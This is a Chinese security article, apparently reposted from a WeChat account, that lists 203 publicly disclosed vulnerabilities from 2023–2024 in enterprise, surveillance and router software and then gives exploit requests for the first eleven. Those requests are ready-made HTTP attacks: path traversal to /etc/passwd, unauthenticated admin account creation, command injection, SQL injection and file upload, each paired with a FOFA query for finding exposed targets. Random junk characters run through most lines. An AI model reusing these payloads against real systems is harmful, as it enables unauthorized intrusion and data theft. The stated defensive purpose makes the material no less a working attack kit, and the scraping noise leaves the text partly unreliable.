互联网公开漏洞整理202309-202406 m5 ~) R3 B. u4 a
道一安全 2024-06-05 07:41 北京
5 G) R9 Y! c* S5 j7 N( M* ]! w以下文章来源于网络安全新视界 ,作者网络安全新视界; ?# F" y) F" d- \
. L- k. v: V, @
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
, u+ Y! k7 R9 r/ W4 c/ c5 c: ]4 B( B0 o5 s4 W
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
; e( J6 B7 N d
5 q H$ z. v; \' n安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
3 r+ W$ C6 e& _( c7 P" _" [! r2 i/ S# Q F% v
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
% f* ~& O3 o# V h8 y3 Z8 C$ i- t+ y) J
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
, K2 Z& |) J! f1 ?6 }$ O
6 j0 x6 b' F! E
3 F5 D; m8 `; A) Q声明
$ L- d# N ]1 b. v# B' s! ?) [' \' l* p2 j7 y; d& u- x4 \: G" _
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。' ]" Q7 M1 W. N' ~
% `, r0 B% a# i9 A* J0 R# g$ z
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
& i) ]0 i7 Q1 N; B
! [0 I2 u. c! Y% m {
0 k" _/ ^- ]. V, V* b& i8 Z* N& g( e' v5 N
目录) c9 Z4 d, v( B" |/ {8 @9 h/ `+ M
( l' [' d8 H2 |6 R5 q, _5 P1 h01
& r4 G, L+ f/ }6 {8 D( {7 q8 o. n4 b
1. StarRocks MPP数据库未授权访问2 E2 Y5 @% [/ j
2. Casdoor系统static任意文件读取
0 k2 j6 s# e. o$ Y& i3. EasyCVR智能边缘网关 userlist 信息泄漏5 R" P! Q2 Q, h$ L6 r
4. EasyCVR视频管理平台存在任意用户添加4 e. v0 r( I. X* ^4 q5 \3 J$ j
5. NUUO NVR 视频存储管理设备远程命令执行
1 _5 e% j& z+ ~% F, p6. 深信服 NGAF 任意文件读取( r { w, A1 u) `# g/ K
7. 鸿运主动安全监控云平台任意文件下载
' O7 V/ l6 n, s8 ^8 x ]6 O6 ?8. 斐讯 Phicomm 路由器RCE& i ^, ?: }! I7 C; t8 [
9. 稻壳CMS keyword 未授权SQL注入# L3 D* @/ Z2 w) Z% t2 Q
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
; z$ O* c' s; a+ o11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
" W; N" ?8 t: |2 h g, R* W" R12. Jorani < 1.0.2 远程命令执行
8 w7 s. T9 A5 O0 @ t13. 红帆iOffice ioFileDown任意文件读取, d; g9 B( L; z- @
14. 华夏ERP(jshERP)敏感信息泄露9 y* ]% k" |2 H. ]
15. 华夏ERP getAllList信息泄露
( d4 B7 o5 k% r3 a16. 红帆HFOffice医微云SQL注入
) c9 \+ z1 c9 s1 n7 q9 l+ f' k17. 大华 DSS itcBulletin SQL 注入
( F6 b1 e& ^# V4 C/ n18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
; a Z1 O9 W! t7 A* E19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
- G& u! H) V7 L* r6 A( Y! ?* {% {0 h20. 大华ICC智能物联综合管理平台任意文件读取0 k5 W7 w( ?) S
21. 大华ICC智能物联综合管理平台random远程代码执行4 h5 m2 B7 `4 a) Q+ J2 d* G; l
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& h1 T4 `6 m7 e5 V [% p6 k# G9 x5 v% k23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ Y' |% }4 s2 j0 O$ t. K24. 用友NC 6.5 accept.jsp任意文件上传) T9 ~& d- h, a/ l3 A" \; U1 C+ C
25. 用友NC registerServlet JNDI 远程代码执行2 D$ r6 Q) `4 z" ~. n9 b0 L- r: p
26. 用友NC linkVoucher SQL注入! v: k) Y4 B3 U! S' Q
27. 用友 NC showcontent SQL注入9 R F7 w; o' Q9 E
28. 用友NC grouptemplet 任意文件上传% e3 X! G6 t% `, K
29. 用友NC down/bill SQL注入
( T0 I. K; _; E! G3 L8 U30. 用友NC importPml SQL注入
% P* Q n& [- w5 x2 x31. 用友NC runStateServlet SQL注入
4 K4 |. K7 D4 A32. 用友NC complainbilldetail SQL注入
( y, \0 U- {2 w$ O# X! J33. 用友NC downTax/download SQL注入- @4 G7 w* u' o+ I
34. 用友NC warningDetailInfo接口SQL注入0 P1 ]( G8 D* @$ T" P+ ~3 F" r+ \
35. 用友NC-Cloud importhttpscer任意文件上传) u! X! @) l' h+ e6 X8 M
36. 用友NC-Cloud soapFormat XXE
) l# ^, e5 k, X; n: N37. 用友NC-Cloud IUpdateService XXE
. w2 W0 b. A' x" y38. 用友U8 Cloud smartweb2.RPC.d XXE2 p h i Q4 j5 \
39. 用友U8 Cloud RegisterServlet SQL注入
- d) S( {8 o8 m* T8 @40. 用友U8-Cloud XChangeServlet XXE
) t: W$ _6 e! B$ | ^41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
+ M! _3 k/ z, g9 m' y- p* k42. 用友GRP-U8 SmartUpload01 文件上传/ k5 @ [ X' T1 e2 N) n
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
: G# O' L' k+ L" l0 s' l8 R" b44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: I6 N- y3 J. A9 y45. 用友GRP-U8 ufgovbank XXE
) l5 y6 v4 g/ @5 v. e46. 用友GRP-U8 sqcxIndex.jsp SQL注入
6 P& `- i- b# u6 A& z' E; ]7 s47. 用友GRP A++Cloud 政府财务云 任意文件读取
/ A, _- u5 ~4 G9 e& u, Z2 U" ?48. 用友U8 CRM swfupload 任意文件上传8 W+ E: b5 \: T8 ` m
49. 用友U8 CRM系统uploadfile.php接口任意文件上传" v5 p/ o- }, W6 U k% I/ W
50. QDocs Smart School 6.4.1 filterRecords SQL注入. u6 [& Z+ Z8 p
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入+ j6 e M/ v- I ^' `5 R
52. 泛微E-Office json_common.php sql注入
R! X' [0 V0 z! p53. 迪普 DPTech VPN Service 任意文件上传
, f4 D2 A2 b" T' \' ` s4 r54. 畅捷通T+ getstorewarehousebystore 远程代码执行
' h0 K; G4 z% K! {+ V% d$ z55. 畅捷通T+ getdecallusers信息泄露- i. e7 d, b+ |' C, i- k
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
9 n/ O! o. d1 {+ y O57. 畅捷通T+ keyEdit.aspx SQL注入* {. ?# P8 l: W# B0 D$ y
58. 畅捷通T+ KeyInfoList.aspx sql注入
: K9 y9 O+ p* m" Y! p59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* g" r$ J O+ A" f; b
60. 百卓Smart管理平台 importexport.php SQL注入
$ T+ a8 x+ B/ d# h9 i+ d61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
* O( c% r3 `8 O62. IP-guard WebServer 远程命令执行
/ e# s3 f c, m63. IP-guard WebServer任意文件读取
) o8 R) V0 l. ]; T* s* N64. 捷诚管理信息系统CWSFinanceCommon SQL注入
3 q' w: r% l; D65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过# [' }1 \9 B8 ~, a# {
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入) k9 c, q$ Z5 w4 d. x
67. 万户ezOFFICE wpsservlet任意文件上传2 b& f6 k/ w2 T& C
68. 万户ezOFFICE wf_printnum.jsp SQL注入, X* D/ C7 a( a, |# v. `( {
69. 万户 ezOFFICE contract_gd.jsp SQL注入
/ X' K. V" Q; x' e1 E70. 万户ezEIP success 命令执行
A F2 m0 o! C x ^7 N71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
U1 V- A% R6 f, D: o72. 致远OA getAjaxDataServlet XXE; r# M) J$ R) |8 X$ [% v. y
73. GeoServer wms远程代码执行
5 Y# g$ @+ [$ e7 Y$ c7 s7 v74. 致远M3-server 6_1sp1 反序列化RCE
, g9 m) d( P9 x$ D n) ]2 h! i0 B75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
2 x5 K' ?! h; X m76. 新开普掌上校园服务管理平台service.action远程命令执行7 Q& C/ k5 j( n4 Y( ~$ D' D
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
0 E% c! m9 s: _2 Y% m; {78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传0 ~9 D4 q, _; V5 a5 l0 d1 F. B
79. BYTEVALUE 百为流控路由器远程命令执行
a- j. d7 k1 g80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
3 g' Q/ f6 G; _; h+ T( U81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 l! i, H9 Q+ J4 `- R2 V
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
+ ~8 e* W4 `; N. [83. JeecgBoot testConnection 远程命令执行' Q7 }/ }1 f' g4 U: Y8 p7 p
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入5 |" m$ h6 Z' k8 i. z# J$ v' m
85. SysAid On-premise< 23.3.36远程代码执行: q4 G5 j! S0 o. H
86. 日本tosei自助洗衣机RCE+ C) | y( e# i) M* A
87. 安恒明御安全网关aaa_local_web_preview文件上传# L! p7 E% d; ]1 h, ]" \
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行# W4 p2 B* v0 N) y
89. 致远互联FE协作办公平台editflow_manager存在sql注入' ~$ h, \* R/ B# Y+ x
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行+ q9 o r; _; Q! A" r
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取+ b# M& l* n5 L
92. 海康威视运行管理中心session命令执行
5 _4 B: z' [8 x( u- X4 V9 w93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传; b& i7 R, ?9 b6 D, T' B
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传2 B. `+ W% h- V6 t A( K( o
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
; Z l1 u7 v4 l3 l; }. R# N96. Apache OFBiz 18.12.11 groovy 远程代码执行 S! K Z w# L; h
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行: \. g' G) g R8 _( G
98. SpiderFlow爬虫平台远程命令执行
- E5 z3 W; C. V8 S+ p5 H99. Ncast盈可视高清智能录播系统busiFacade RCE* W, b8 S/ n6 u5 U' F2 G
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" d6 d, U% k: z8 w+ `101. ivanti policy secure-22.6命令注入
$ y. I1 d" C4 M/ R) y4 T102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行& l" y! Q3 @9 P3 B. w; B1 l4 {, [
103. Ivanti Pulse Connect Secure VPN XXE0 V% u3 @ S1 e3 E
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
) }6 u6 F- X: S( k# Q6 I; X5 T105. SpringBlade v3.2.0 export-user SQL 注入
' g/ `; B. a7 d8 A6 G106. SpringBlade dict-biz/list SQL 注入5 d" K% ]; X q. ~
107. SpringBlade tenant/list SQL 注入0 u) p* Q+ Y" J7 R2 ~# z! C3 D
108. D-Tale 3.9.0 SSRF8 l5 j- @ Q3 G3 M s% c3 G
109. Jenkins CLI 任意文件读取
% _( |) M3 d4 Z D2 R110. Goanywhere MFT 未授权创建管理员
z! s9 \4 j& M111. WordPress Plugin HTML5 Video Player SQL注入
* w" A6 x- ?# ~112. WordPress Plugin NotificationX SQL 注入# o" R9 A& }$ s
113. WordPress Automatic 插件任意文件下载和SSRF
% f$ [) l: E5 p, r( T3 q1 y, B* t114. WordPress MasterStudy LMS插件 SQL注入, ^. g4 l' D9 w0 c
115. WordPress Bricks Builder <= 1.9.6 RCE
# v4 p9 Z3 Z9 x; u0 K116. wordpress js-support-ticket文件上传
M \" B% r) o) D4 ^ c' L" W117. WordPress LayerSlider插件SQL注入# G5 v* p- J9 R: b
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
; T7 ^5 b, r( j. Z119. 北京百绰智能S20后台sysmanageajax.php sql注入
. S/ b$ d6 r" C9 `5 h7 ?3 V120. 北京百绰智能S40管理平台导入web.php任意文件上传6 u0 P' |4 {0 E& k5 [; u8 X
121. 北京百绰智能S42管理平台userattestation.php任意文件上传. W' ]0 }" I) Q
122. 北京百绰智能s200管理平台/importexport.php sql注入
7 d4 L, J" E" K2 M% c123. Atlassian Confluence 模板注入代码执行5 \+ F8 W7 s6 }- z) z
124. 湖南建研工程质量检测系统任意文件上传: N2 h | p$ P$ e5 S
125. ConnectWise ScreenConnect身份验证绕过; n" z/ a5 J7 o
126. Aiohttp 路径遍历# r7 ~0 H4 \% Z' k
127. 广联达Linkworks DataExchange.ashx XXE
( C7 C& i6 U0 X( [; c128. Adobe ColdFusion 反序列化
1 w, J, _" ]6 G129. Adobe ColdFusion 任意文件读取7 {) F6 Q' o7 v% O2 r
130. Laykefu客服系统任意文件上传% ]: R% J* z4 Y+ q/ T4 d
131. Mini-Tmall <=20231017 SQL注入
8 |: U1 Y1 ^: w! y' W. M132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过- n2 L4 ^9 K; g6 h) H
133. H5 云商城 file.php 文件上传
6 W( D+ @7 V1 i; g" p _' Q134. 网康NS-ASG应用安全网关index.php sql注入
! f+ C. v0 [! }. Z, W# d9 M2 W135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入/ }, R/ ]0 G4 |' V/ ]. C; P
136. NextChat cors SSRF
) _7 O* s8 C8 n1 k2 K137. 福建科立迅通信指挥调度平台down_file.php sql注入
1 _0 m, f" F2 s; W. n138. 福建科立讯通信指挥调度平台pwd_update.php sql注入& m1 j( Z2 Z! n) k, O% X, {
139. 福建科立讯通信指挥调度平台editemedia.php sql注入) e$ p- Q( e2 n" F& L% {
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
% o0 \8 G0 h, h# K( a141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
9 e: ^; |; B1 G. }142. CMSV6车辆监控平台系统中存在弱密码& B$ a" m- e4 O( A
143. Netis WF2780 v2.1.40144 远程命令执行
% h! ~* F9 Y! x144. D-Link nas_sharing.cgi 命令注入/ A+ K7 n* S) x' V! o
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
- A. @ G) q7 L3 W146. MajorDoMo thumb.php 未授权远程代码执行
: F" H2 v: C4 X d2 Q5 p147. RaidenMAILD邮件服务器v.4.9.4-路径遍历1 B( l) @6 b9 V, E7 p4 j, d
148. CrushFTP 认证绕过模板注入. s, t+ o( u6 P
149. AJ-Report开源数据大屏存在远程命令执行' y0 J4 S: x4 \6 B6 u2 {( u( o$ z* T
150. AJ-Report 1.4.0 认证绕过与远程代码执行
% n. L! Y5 ?* K* p% ?151. AJ-Report 1.4.1 pageList sql注入. ~, _0 Z& X" @6 i* u5 K; c$ o
152. Progress Kemp LoadMaster 远程命令执行
* u7 {9 \7 D/ `' `: U- D+ C153. gradio任意文件读取
1 b; r% Y# L( j0 n0 ^6 F+ m" I9 q9 c154. 天维尔消防救援作战调度平台 SQL注入6 o2 }# V0 R( D$ w! X! ?7 t( g1 a) @
155. 六零导航页 file.php 任意文件上传
4 w) u$ B7 o5 ~156. TBK DVR-4104/DVR-4216 操作系统命令注入0 s! R. Q0 f' }; D. y
157. 美特CRM upload.jsp 任意文件上传
2 h& c# Q6 V. b158. Mura-CMS-processAsyncObject存在SQL注入
. J8 n: @) R7 K) h- o5 ^" T2 S159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传, |# L5 c! L( L& j9 D. y( f6 N
160. Sonatype Nexus Repository 3目录遍历与文件读取
7 J/ @) I; q8 t: J' W2 Y$ s, B# A- a161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
+ Y/ H+ g6 j# ^162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
. L# E: i1 ~8 N& n9 f6 Y3 u# N163. 号卡极团分销管理系统 ue_serve.php 任意文件上传" m: W8 L1 _3 N F2 G$ r! k a
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
7 f0 |! B+ i+ j) m$ o4 d# t3 M165. OrangeHRM 3.3.3 SQL 注入
0 t# H7 A. S. U! a166. 中成科信票务管理平台SeatMapHandler SQL注入
/ c& f4 D0 q" a/ \( _$ a9 h167. 精益价值管理系统 DownLoad.aspx任意文件读取 h: i& e; K/ J1 ^/ A# o# s
168. 宏景EHR OutputCode 任意文件读取
4 `: x+ T. q5 j* c x, ?169. 宏景EHR downlawbase SQL注入1 u- a) Q3 t, X9 Y2 R& S& Z
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
3 q/ c/ ^' g: g! ~5 B171. 通天星CMSV6车载定位监控平台 SQL注入
, `: {* ` M. W; j/ a/ r9 S172. DT-高清车牌识别摄像机任意文件读取% H6 r' t% T( O5 l" P {
173. Check Point 安全网关任意文件读取
% E+ E2 [# |: Z3 j2 X' y174. 金和OA C6 FileDownLoad.aspx 任意文件读取2 L) r) j9 M- z& S
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入" |$ Y0 N( Z, e1 F
176. 电信网关配置管理系统 rewrite.php 文件上传7 @- V$ \5 c, A$ Y
177. H3C路由器敏感信息泄露. N6 J; p }3 s5 ~5 c7 ^
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
$ [, A9 f9 J: ?5 M2 U' |179. 建文工程管理系统存在任意文件读取
: c2 w3 f: W# X- {5 i, s; O180. 帮管客 CRM jiliyu SQL注入& Z7 j- e# u$ c. m
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
: d( E( M3 A3 s. r: J182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 \% @" Y9 o- k" a# Y
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
2 g+ `0 N$ O. B4 k* D+ h# Y7 a184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
( ]; Y! H* L4 R: m* a185. 瑞友天翼应用虚拟化系统SQL注入
, h% l- T. b) r X) n1 p186. F-logic DataCube3 SQL注入
9 s5 T. P5 l6 R" U K187. Mura CMS processAsyncObject SQL注入& I( b" p7 z8 j6 t3 k# q3 z: d
188. 叁体-佳会视频会议 attachment 任意文件读取8 K- u/ F- ~, R! I( ]0 e' E2 N
189. 蓝网科技临床浏览系统 deleteStudy SQL注入( H% c# M. j, |" _6 |9 B8 O* Y0 M
190. 短视频矩阵营销系统 poihuoqu 任意文件读取, \, B( H1 c) k6 F& \, W2 d1 T
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入8 v/ K4 B( w. s9 b/ n( i
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
8 e# p5 ]+ s3 a t193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行8 {; w, `( \& d- B- e
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
4 l. j2 N% O7 J5 l195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
6 V% Z' A/ p6 x1 G196. 河南省风速科技统一认证平台密码重置
2 d! Q# T8 |5 D! v6 d197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入! [! v! {2 e9 Z$ T s" G, ]- V
198. 阿里云盘 WebDAV 命令注入/ F5 l! X0 q' |( k7 b
199. cockpit系统assetsmanager_upload接口 文件上传8 s6 x9 p* k4 Y$ H
200. SeaCMS海洋影视管理系统dmku SQL注入0 @/ Q, J8 o9 _. t* C
201. 方正全媒体新闻采编系统 binary SQL注入4 P# Z9 q' E- N/ V+ r
202. 微擎系统 AccountEdit任意文件上传
a8 a2 E2 M* k7 ~* T2 _2 c203. 红海云EHR PtFjk 文件上传
! w- s w k5 ]5 b( `3 ^) l) |) V9 |6 i- ]0 P+ j* p- _1 k/ D
POC列表
& F, ]1 l' v, B* L5 x8 _, H
8 b9 v: D& |9 g+ Y+ n! ^02* s T" z6 Z+ _/ a9 c
. @9 e/ U9 b3 d! f& P! R. W
1. StarRocks MPP数据库未授权访问7 e) n4 ?' i, d+ D* _
FOFA :title="StarRocks"
( _9 U# L; a$ o' d* JGET /mem_tracker HTTP/1.1" ?4 d( R" G* v; H" x9 g0 }7 U% v
Host: URL
- M( d4 {/ R1 ^2 E1 f: T. |8 P" s0 h, w3 t1 _: ]0 n2 C
' |4 r, s! ^) f6 {2. Casdoor系统static任意文件读取- E3 h2 R* y. C' N$ ]" @
FOFA :title="Casdoor"9 |9 |- H3 c5 R+ n: N- }/ h3 z
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1! v: q" \% G, j' y
Host: xx.xx.xx.xx:9999
4 U5 W/ A1 q+ GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 S+ M5 s0 t1 i/ \0 h) V4 q
Connection: close* k% g) n; {# H9 W* E
Accept: */*" R3 F/ [! K# h% y4 [9 E8 Q
Accept-Language: en8 }& m) M }, J; {- N: o4 o
Accept-Encoding: gzip, x: b$ W6 {" |' w4 c
: Y* I4 Z( f- g) f; N2 a- p, E9 N/ `$ Z9 D& ^" M1 O
3. EasyCVR智能边缘网关 userlist 信息泄漏% o- G2 G* L' ^9 x
FOFA :title="EasyCVR"
+ f+ M- P3 @* \4 m4 [GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1, F5 J/ Y5 P% u. o
Host: xx.xx.xx.xx
6 _1 a& E! A6 Y3 M& _3 ^ f$ p) o9 k B3 T& R
2 }, b: _9 u9 K. z' J O! A
4. EasyCVR视频管理平台存在任意用户添加
' M+ b7 G/ O' R' h! {$ P% f0 q% HFOFA :title="EasyCVR"- v9 u% k& j1 P' Q
1 Q% }) v& ^6 `( B# `$ `# fpassword更改为自己的密码md5
3 r/ p0 `% `9 I) jPOST /api/v1/adduser HTTP/1.1
+ ~3 z6 C- T6 X' \Host: your-ip# U r9 R# t" \+ @
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
$ x4 M m" l9 m7 W d2 w, L/ U* d2 M: |* z$ O2 R! O4 p: L8 o
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1! F) e6 o$ ?4 o. i& \& Z
$ s/ K! P/ F7 S( K
7 `8 A& I; K& A8 L# D V* e
5. NUUO NVR 视频存储管理设备远程命令执行' ]9 a$ ^) s T- s% c
FOFA:title="Network Video Recorder Login"
% ^+ `. D* N# oGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1, p/ y7 ]: ?. I7 K; m1 {* x. j4 O
Host: xx.xx.xx.xx
5 e; d. r4 T- }& j
: o+ T4 u, T7 e% o' c3 N# |
3 L# J% D% @, m5 Q$ _# i9 B9 n" C3 f6. 深信服 NGAF 任意文件读取
: A2 D5 ?. p& @ B H# c# t2 t QFOFA:title="SANGFOR | NGAF"( W" v7 u/ {) ~' Y @) x! A
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1' r2 u1 k4 J# M+ p3 v
Host:
" ~+ Z% M) o' C% M/ v( p- U v* D+ f& i: Y
- Z: Y/ g0 A3 F8 C7. 鸿运主动安全监控云平台任意文件下载
2 x# [* G; y* X3 D0 PFOFA:body="./open/webApi.html"
1 s$ {, ~0 ^, ]+ I5 L/ fGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
# X8 x( r: o( xHost:, }* T6 ]$ c5 E' M1 d0 k" W
+ C" R, }: E+ N( X% q" o5 _
# e% {+ n6 A$ t+ M& _
8. 斐讯 Phicomm 路由器RCE' N3 X8 w8 d/ ~* _) f% F; b
FOFA:icon_hash="-1344736688"* s; W0 ?1 f2 u2 T% Z" X
默认账号admin登录后台后,执行操作3 C0 s- T; ?' b1 D) j* F4 S
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
* G9 k$ M! I" jHost: x.x.x.x
, ?9 b' C/ I8 ?1 wCookie: sysauth=第一步登录获取的cookie/ U% z, e- ?" Y1 Q b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz1 O# e3 y0 y' [ v P9 N
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36- @1 I3 J( [ k
+ x& S# D/ O7 P y' `------WebKitFormBoundaryxbgjoytz& H! X/ _$ a( J2 A) E
Content-Disposition: form-data; name="wifiRebootEnablestatus", T- a ~8 W2 q: c) `, \; M
* {$ G! ?8 B* W- ^%s+ W: D2 B& ?: w/ _* ?
------WebKitFormBoundaryxbgjoytz
1 a @0 z7 k7 a* i, m' CContent-Disposition: form-data; name="wifiRebootrange"
! U' l: n- m6 V3 M# T
8 u# J+ w3 W9 h& g% M6 X12:00; id;! B; @" k- s4 d! j8 R
------WebKitFormBoundaryxbgjoytz# U0 H) c3 ^* |! s7 \; a' T* v2 l
Content-Disposition: form-data; name="wifiRebootendrange"
+ F9 j/ g( Z) y) b9 _+ o4 H" L0 k- {& Q9 U
%s:
7 G+ E1 {) E$ s2 U; F------WebKitFormBoundaryxbgjoytz6 X3 h2 k% X. B* _6 b
Content-Disposition: form-data; name="cururl2"
) }/ u8 \" e0 X- A
+ _ |5 X1 ]* h% K- @: `. x1 j
. D5 S+ }6 E3 ]- I. z1 ~------WebKitFormBoundaryxbgjoytz--
( F: `7 U7 W# Q7 {) m% ~ V7 N5 [9 b% @9 u: x
3 s- T4 C8 u2 W' [! g9 @
9. 稻壳CMS keyword 未授权SQL注入7 `1 C6 G5 k: P
FOFA:app="Doccms"
2 a; G- d2 b. Q) ~+ rGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1: F ^+ l4 h9 t( k- J0 K1 v* R) k
Host: x.x.x.x
8 y8 x. X5 R: U7 |* g" ^7 \) ~; v; g1 M
6 b* E' Q2 H0 O/ ]" l$ {
5 h$ j$ `7 s$ T4 U$ L+ e$ A epayload为下列语句的二次Url编码
( ]$ C* [1 `, K' O' Q9 l
: o5 W2 h+ T; ]1 d& X& W' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#$ m4 A+ d) N1 K. R6 b+ U# v
4 e# ~+ y) d8 T0 i1 p10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
: P! }+ A; E4 t3 xFOFA:icon_hash="953405444"
$ E4 V6 |7 f: q/ S
; p, I% d' `6 f2 _5 N4 |" V文件上传后响应中包含上传文件的路径/ U4 ~; E! `+ z, M; F6 \
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
0 ]" B' h8 n. i1 ^; ]Host: x.x.x.x:xx
$ w6 u$ ]- C" u4 w. _& L0 i4 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* u' n+ z8 \; W; K; ^
Content-Length: 197
* k3 K2 Z1 r- n" N9 Q9 I8 e5 f/ |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" j. U& _, P. j! {% X% g9 ]
Accept-Encoding: gzip, deflate: r- D- p V1 C) L
Accept-Language: zh-CN,zh;q=0.98 ^% T; y( I# S0 ]+ ]7 u' w
Connection: close
6 h* }( d/ [- h1 kContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu* {' }1 ?: E4 i( t0 {( G
7 K, G- }) F8 v& c/ @( i1 T
------WebKitFormBoundaryxdgaqmqu; R% P3 B2 F( i
Content-Disposition: form-data; name="file"filename="icfitnya.txt", M/ z0 ^; C4 V8 l |
Content-Type: text/html
k1 M) q# I5 E1 U c! N; X' Y# k; v# H
jmnqjfdsupxgfidopeixbgsxbf. v$ i% f9 w: V1 ^ d6 c/ P' n4 b
------WebKitFormBoundaryxdgaqmqu--& u6 T+ v g* K j0 u. h
4 f9 ~' K$ w8 h) D+ S Q0 w# I; U1 t
; g+ k7 C$ ]4 I1 L9 t" M4 P
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入2 V3 V8 l) `% E& V% H0 e9 F1 i5 |
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
% W2 a) x, ?0 f& e4 p( p# fGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.19 u- T, Y+ [" r
Host: 127.0.0.1
: m# _4 ^) H/ p% U, R4 sPragma: no-cache
